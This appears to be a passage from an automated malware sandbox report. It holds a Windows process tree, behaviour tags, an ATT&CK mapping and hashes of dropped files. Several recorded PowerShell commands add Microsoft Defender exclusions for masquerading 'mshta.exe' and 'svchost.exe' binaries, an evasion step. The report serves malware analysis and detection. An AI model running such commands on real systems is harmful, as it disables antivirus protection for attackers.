C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:29⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:39⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2816 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4564 /prefetch:89⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4564 /prefetch:89⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4992 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4800 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4804 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4884 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3224 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4140 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:19⤵
-
C:\Windows\system32\msdt.exe-modal "197078" -skip TRUE -path "C:\Windows\diagnostics\system\networking" -af "C:\Users\Admin\AppData\Local\Temp\NDFFDA9.tmp" -ep "NetworkDiagnosticsWeb"9⤵
- Suspicious use of FindShellTrayWindow
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3504 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,12046622252743292967,939472895097889951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4888 /prefetch:19⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=hat.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.08⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xb4,0x108,0x7fffec2046f8,0x7fffec204708,0x7fffec2047189⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe"C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\mshta.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'mshta.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe"C:\Windows\System32\WindowsPowerShell\v1.0\ONPE.exe"7⤵
- Executes dropped EXE
-
C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe"C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\svchost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
- Modifies data under HKEY_USERS
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS1⤵
- Drops file in System32 directory
- Checks processor information in registry
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\winethc.dll",ForceProxyDetectionOnNextRun2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s WdiSystemHost1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --default-search-provider=? --out-pipe-name=MSEdgeDefaultbcd1a1cfhd411h4ae1h9fe3h3354cdb4a53e1⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x120,0x124,0x128,0xfc,0x12c,0x7fffec2046f8,0x7fffec204708,0x7fffec2047182⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,1430714184297952503,12384781248704128857,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2148 /prefetch:22⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,1430714184297952503,12384781248704128857,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:32⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman1⤵
- Drops file in Windows directory
- Modifies data under HKEY_USERS
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
2Windows Service
2Event Triggered Execution
1Netsh Helper DLL
1Defense Evasion
Modify Registry
3Impair Defenses
1Disable or Modify System Firewall
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024062920.000\NetworkDiagnostics.debugreport.xmlFilesize
76KB
MD58ccea272ca15f9f95878b4a75e9a6ca9
SHA1939c71347274667685d2692481eb849547a21424
SHA25619973d08d57bdf922ff8d95778536c4623e86713585465286c9a643b9207a795
SHA5123b5680bc929c84a2f88ae2d9b29554abb53d362ac5d16b1f9af4636395ecef4e6b6594426e7484c938678bd6d054d3df40f574ffdb4f120f397c18be7c1db027
-
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024062920.000\ResultReport.xmlFilesize
36KB
MD5129d8019e720103ed877ac6ff04a4297
SHA1f56ee8aead2c02c6350280c7e33340d186089b03
SHA256b15c8229e97687c8682a9b8a924f233a1a8994cd41889102e321cf745524800c
SHA5122a92f706166c4ee5ea1242aee505c1384440f3ad3a6cdd8403efaf245f0b9d63d074b27c4731055bf2201389fefea2d952aceaa6813959a5d52acba85352a34c
-
C:\Users\Admin\AppData\Local\ElevatedDiagnostics\460911090\2024062920.000\results.xslFilesize
47KB
MD5310e1da2344ba6ca96666fb639840ea9
SHA1e8694edf9ee68782aa1de05470b884cc1a0e1ded
SHA25667401342192babc27e62d4c1e0940409cc3f2bd28f77399e71d245eae8d3f63c
SHA51262ab361ffea1f0b6ff1cc76c74b8e20c2499d72f3eb0c010d47dba7e6d723f9948dba3397ea26241a1a995cffce2a68cd0aaa1bb8d917dd8f4c8f3729fa6d244
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5661739d384d9dfd807a089721202900b
SHA15b2c5d6a7122b4ce849dc98e79a7713038feac55
SHA25670c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf
SHA51281b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD54158365912175436289496136e7912c2
SHA1813d11f772b1cfe9ceac2bf37f4f741e5e8fbe59
SHA256354de4b033ba6e4d85f94d91230cb8501f62e0a4e302cd4076c7e0ad73bedbd1
SHA51274b4f7b24ad4ea395f3a4cd8dbfae54f112a7c87bce3d286ee5161f6b63d62dfa19bb0d96bb7ed1c6d925f5697a2580c25023d5052c6a09992e6fd9dd49ea82b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5ce4c898f8fc7601e2fbc252fdadb5115
SHA101bf06badc5da353e539c7c07527d30dccc55a91
SHA256bce2dfaa91f0d44e977e0f79c60e64954a7b9dc828b0e30fbaa67dbe82f750aa
SHA51280fff4c722c8d3e69ec4f09510779b7e3518ae60725d2d36903e606a27ec1eaedbdbfac5b662bf2c19194c572ccf0125445f22a907b329ad256e6c00b9cf032c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5f50a091b253172037dd77531196b8e6a
SHA17b7f973390d1ca3ab838fbadd952031b92cf2f2c
SHA256518fbb4abc9695517fc23bc4e93b866318f41deef16b265c3d3d11e3a4855225
SHA5120f650bbaa413b1a4bed72de2420104e9d032e47bd3a06e8a7c9b93d24ff1770d1dd9775d09931410da99e6c77ec5c5f0982dec6fcbd77d4939f413aeee447856
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD50b9413c83e56e3c23e204843dce03482
SHA156b4bb587536ec43ccf5d1a1dc549a1008890a0c
SHA25678d3158c6a79639b012ef7851b46489a4c020e971482a7be198ec74e63a9a281
SHA512350a951d8413d0d654240a85b561087b10c5aa47c8a2351c8dba3ddb9e9ec3b33a1aace1386983fc0f6730a78028ac2482de1c56fd1c5f4bdfc6bf1d7d08df92
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD524a1b8cbcd8c68c91c2cdedec7989966
SHA12d65b0266699c1ba4f0cc0cb2b3a71c1031b9de0
SHA2565cafbd0285d32183dc26dd3c6b2cd1abecb2394aeed9343622cabefe8ebdb79c
SHA512b489719003c6d2956dc4ef7a8355747abbb05900d8e903f5e4c76f98acdf38f3421bc10fe96e2a684830c74d8958004245e2dc61a5a3631786ce4fafc4a202f5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5af387375b6efd28eb75029d7643a863c
SHA179a190af5a93a43a898016decfdeeca4bc57ae4c
SHA256e2ae929ad7023da77c2d48274983b0d1ec3dcf9a7aa26f00fc0dbb97a1ed5945
SHA5122e323be26de02d52af8cda31cfa7356941f6c895edca5790ef26bd51f2716fdcb7fbe1096984854e18e3c3094e08bfecb6a1699e6645e33933a997fe012ed8fc
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
8KB
MD5c9041f461132e93f594aef4c22567a01
SHA15c6042634ac65fb3e81ff89c47ce2780ff56b476
SHA256d3ec5c00bd2e9d999fa0264e53c52766614364a48c117bc9853889df6fb2019c
SHA512c597810c990114fca8d86d985db8e61c8562962cc7f0cd07a88f06aa9748569bce1f8db4ae45feeceef993706d2a13754c18200c774846f2cfaba18bd4eb6ee3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
8KB
MD54c2458dd89f8675a223101b66e73c97a
SHA1d22698525a982c04434316f8824f89f4f8fb3fbb
SHA2564d427c92c9f59eb3457a94eca1cbbda4846e9751567848f03d0c1ca259e4aa3d
SHA51244c098fbdff31525948865c4da0de6d067aa655d89eb17cf288f952e6e959697d22119d569d070f08824fd7f036e2613fe082dca7816b826051879edadce7b68
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
9KB
MD509de602b16b6d8443257146db2bad1c9
SHA15dad021072f29bd13813cd5c4bef698075439b8d
SHA25674fa124e03d07ca98f9a33aba4728de18e1a8caa0460e07630e0830699406bb1
SHA512c0866ba064c391584a68bb4ac1884793bd3e2da27203f8476bc760429796acb14f0cbc4ba2dcc50966dcec7968be16bdf3460edd83e784d6b15830e1ae687b6a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
8KB
MD5d84f682c536219c60b20ca215d3e8495
SHA1fa7626f812b4f5998713ba2aa4aba0b748493818
SHA256750b2c6291f33326f332f876eadf9ae400a51a0445d294896781391328d6b9fa
SHA51276d3e0e886a2afd0d634f66130020dd4cf16ddd8becac2807e37e1b6882c72173d31ef215cd5d5256933ed585cfa20e5178c78f50437b2cee3809904b7b71cba
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ShaderCache\GPUCache\data_1Filesize
264KB
MD57c73d321e34419e94ed77d0fd1b53ea8
SHA17597770df1590bfb9b859b6c80a23141b56c4232
SHA2565afc5732b69b310dc0c16f7f94563fa8c02a9e8ee2bf19365c36d6f3a295b297
SHA512af8517d5cd91052ba5ab8f3e2bb74a3b057e56dd694fca36850cb225a6e4d59e7c7bdbe16363db046dc2ce071f241a002bb85d3c7d553dfb43b58081eee149ba
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-InteractiveFilesize
2KB
MD5005bc2ef5a9d890fb2297be6a36f01c2
SHA10c52adee1316c54b0bfdc510c0963196e7ebb430
SHA256342544f99b409fd415b305cb8c2212c3e1d95efc25e78f6bf8194e866ac45b5d
SHA512f8aadbd743495d24d9476a5bb12c8f93ffb7b3cc8a8c8ecb49fd50411330c676c007da6a3d62258d5f13dd5dacc91b28c5577f7fbf53c090b52e802f5cc4ea22
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD571c4b1323b5c2b0b3dce79a418170c57
SHA1f2484755165cc812bd2017c3ff93d7aef8e9f642
SHA256b7151a59702581451ad3accb25d5aa7889a4d385142568331f42b0fcc2019872
SHA5129048311d8ca08c33c090038fce1b5f28d22e1b9b0c1a6bb27f97619c778e2d474a3f10ab92c76bd487b94e059b5d066d1d960eec15b6a3a74355099494172e51
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
944B
MD577d622bb1a5b250869a3238b9bc1402b
SHA1d47f4003c2554b9dfc4c16f22460b331886b191b
SHA256f97ff12a8abf4bf88bb6497bd2ac2da12628c8847a8ba5a9026bdbb76507cdfb
SHA512d6789b5499f23c9035375a102271e17a8a82e57d6f5312fa24242e08a83efdeb8becb7622f55c4cf1b89c7d864b445df11f4d994cf7e2f87a900535bcca12fd9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
476B
MD5a2a3e713b8102a049e33bcd4fee0e4d6
SHA1744cd284be9388f9520a3f4701d23bc9ddcb0146
SHA256195332abc0ac61ad5a80f4afad532924270e08ecff0b889c39b8d1c87475ac90
SHA51241d911e6a4010f34927971f61c4ced3c91388408867367ce35d2e2cf687592f68909704d5ad07c73c95fcfb8cfc5eab0e84e8b3033fc2b1411b2cb6b17ab5c9e
-
C:\Users\Admin\AppData\Local\Temp\Log.tmpFilesize
85B
MD559c7f92111cb0ed9f61807ad8fb69201
SHA1012a06dd89a0098cb073339865a31f378d1758b8
SHA256d5bc36c8062e07c33224b0d332303c430edce4efff9423278766fe68a45003bd
SHA512cce71225de2f41fb2202449898e3a61d29ba674603813b5aef09c8bb9f904efa1434bcd9965078448b78e94acf7735bae0f345c5dfacff6f27257d60c34c64c7
-
C:\Users\Admin\AppData\Local\Temp\Log.tmpFilesize
170B
MD59042b277c61a53ff2a33a1c912284a6a
SHA10212cd7f802081b79ffda2150c074da22f17471f
SHA2561e0431d52511ec083b0e21858f989d8622bd324321cc14c97152cc34731fb7c3
SHA5127e3db95bb41e2240b73aacb18996e3ec654a7a5b3a8a1e866215652fdc229552b8c6493d65f77e0d48900d7c14c01bf1d2d55ad7662ef6d417b7d52fed4307b1
-
C:\Users\Admin\AppData\Local\Temp\Log.tmpFilesize
171B
MD541f01682bc2908a8ce161b6246da5639
SHA19be8f8c21d2478e90115baaa692d6151dcc23718
SHA2565e0f66d762201a494e811400801fe266186a27628f65f83e44c1bcbfdf34661c
SHA51288ad5601291e4f917e7fec5f08218eaac9a53bb1aa9566a1b3a9aa01a714cc68b91d79ab01a07cd1a31b747390703211b29ff910e1b3a5f1094c1af0b3d35e13
-
C:\Users\Admin\AppData\Local\Temp\Log.tmpFilesize
172B
MD558b5892e88a79021b5a3cb67628274a6
SHA124525deda7f2f67375e2398ff11600285dbcfbf6
SHA25692c2d3506079a411774b46a3884b1701ee6eca86150df379fd24121095b3033d
SHA512fc5be508111d35234e89f5204b386cb6ff0ceaaf1a275955a8a3ff9e1e77963875f247632a002d0ae8e71d899f01c074db4f308d71b77f396fd67b258e079741
-
C:\Users\Admin\AppData\Local\Temp\Log.tmpFilesize
173B
MD5fbf7ea4d37e806d4715d00f163a5f51c
SHA17f25bdfc8896bfbcd752264a03a67f3c5727f8bd
SHA256e21c5fa361c5353b3e5f4e56b389a094bbd577bc3a3745e4a150d07f3efa2210
SHA5124879988db14df5474b37f5f23b2c758e2c5a0cb6223a6951ccf8fb0d38fbd5e57c7982963e6f3979b46097dc9c5876f38cd2821f72060aeb94a8f53945212aef
-
C:\Users\Admin\AppData\Local\Temp\Log.tmpFilesize
174B
MD57c868fd556f6cdfaf9ccee6bbe6a1c9e
SHA1ac23dd52faea0d97c6ea727f8ca896f456722a39
SHA256863017562cb081b8d1f69c05ded1df3b4c9d0e2c391a90162b730347b1124001
SHA51210764f83320fbeeef5fe5e77355c4380dda86c5b102622b64d386fdd211c54b6043eda832496e577f832237b8defb0271da671207024889d49f71a40521776cd
-
C:\Users\Admin\AppData\Local\Temp\Log.tmpFilesize
175B
MD57fcd8a23617cdee8cf4d1597f91e53b2
SHA1eae7baeb0bd5dabbea13e2a9048dc56c9b8f11bd
SHA25662fc3d66c994983cebd413784dcb859a79b89a66e67ea2260ea9afc2434f06df
SHA512b03045688f41550fe6f802beb22d62f50641aa32276796f639e0a0876c5770034fe580a184961f624e30719f7b91f8c8a27279fb44cb3b914a12f43cc0d566cc
-
C:\Users\Admin\AppData\Local\Temp\Log.tmpFilesize
176B
MD5d6287061cc091a7f4906611a175eac9d
SHA13c23cf12f57aebce123d1b6cf89dea3fb3f74b21
SHA256cecd1db0a4fd12e6da6776882860c254e8bddf3fc5fd802547ff99baac438fea
SHA512e83a732e0583ee71c0b9a54706c90383ad8c94223811263e05273d235e5659e4df47e284dc13af692462899f577b4591b75ebbc66379b0ea89d03990498b3098
-
C:\Users\Admin\AppData\Local\Temp\Log.tmpFilesize
177B
MD573828ea24989867e340a28f70bc0c017
SHA18233b94ec65ad008ca61a743212c36294ec5902e
SHA2567122e80459009a96b01d3d73194d4ef244b5d10872c821dadf152d8dcc522b06
SHA512cda4f8d81dd1811453c94e71d96ac2d79941b141ee4bb1d8de82eca9d7535f2da0168bb603188611732f1aa9f5b8731b97f6d4d087968cf596d12f1ac2842581
-
C:\Users\Admin\AppData\Local\Temp\Log.tmpFilesize
178B
